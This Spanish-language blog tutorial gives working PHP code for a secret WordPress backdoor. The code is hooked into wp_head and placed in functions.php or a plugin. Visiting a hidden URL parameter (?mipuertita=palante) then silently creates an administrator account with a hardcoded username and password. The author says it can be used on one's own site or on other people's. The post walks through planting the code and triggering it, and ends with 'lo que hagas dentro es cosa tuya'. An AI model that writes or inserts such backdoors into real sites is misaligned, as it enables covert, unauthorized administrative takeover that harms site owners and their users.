¡Relaja, que no vamos a hacer el mal, o al menos la intención no es esa!
Hay montones, mogollón, la hostia, el copón de situaciones en las que puede que necesites disponer de un acceso secreto, lo conocido habitualmente como puerta trasera o backdoor a un sitio WordPress, ya sea tuyo o de otros, eso da igual.
Y no voy a entrar en las situaciones, motivos o necesidades, aquí estamos para aprender, y hoy toca saber cómo acceder a un sitio WordPress creando sobre la marcha un nuevo usuario, con permisos de administrador, saltándonos cualquier restricción, medida de acceso, etc.
Código para crear una puerta trasera (backdoor) en WordPress
Solo necesitas acceder al sistema de archivos, para poder añadir un código, como este:
function mi_puertita() {
if ($_GET['mipuertita'] == 'palante') {
require('wp-includes/registration.php');
if (!username_exists('soybatman')) {
$user_id = wp_create_user('soybatman', 'ungranpoder');
$user = new WP_User($user_id);
$user->set_role('administrator');
echo 'Puertita abierta';
die();
}
}
}
add_action( 'wp_head', 'mi_puertita' );El código anterior puedes insertarlo, por ejemplo, en…
- El archivo functions.php del tema activo en la web.
- Como un nuevo plugin.
- Dentro o como plugin mu o imprescindible.
- Como snippet de código con un plugin (no recomendable, recuerda, es un login secreto)
Cosas que puedes/debes personalizar en el código de ejemplo:
- El hash para crear el usuario:
mipuertitaypalante - El nombre del nuevo usuario administrador:
soybatman - La contraseña del nuevo administrador:
ungranpoder
¡No pasa nada! ¿Cómo funciona?
Efectivigüonder, el código por sí solo no hace nada, ni crea un nuevo admin ni nada que se le parezca. Para que todo salga según lo previsto ahora debes dirigirte a tu navegador y teclear lo siguiente en la barra de direcciones:
https://dominio-en-el-que-quiero-entrar.com/?mipuertita=palante
Verás una bonita pantalla de confirmación de que algo ha pasado…
Ahora lo siguiente es probar a ver si puedes entrar a administrar la web con el usuario (soybatman) y contraseña (ungranpoder) definidos en el código…
Y funciona…
Has creado un usuario con permisos de administrador, con una contraseña predefinida, e incluso sin correo electrónico.
Ahora ya, lo que hagas dentro es cosa tuya.
¿Te gustó este artículo? ¡Ni te imaginas lo que te estás perdiendo en YouTube!
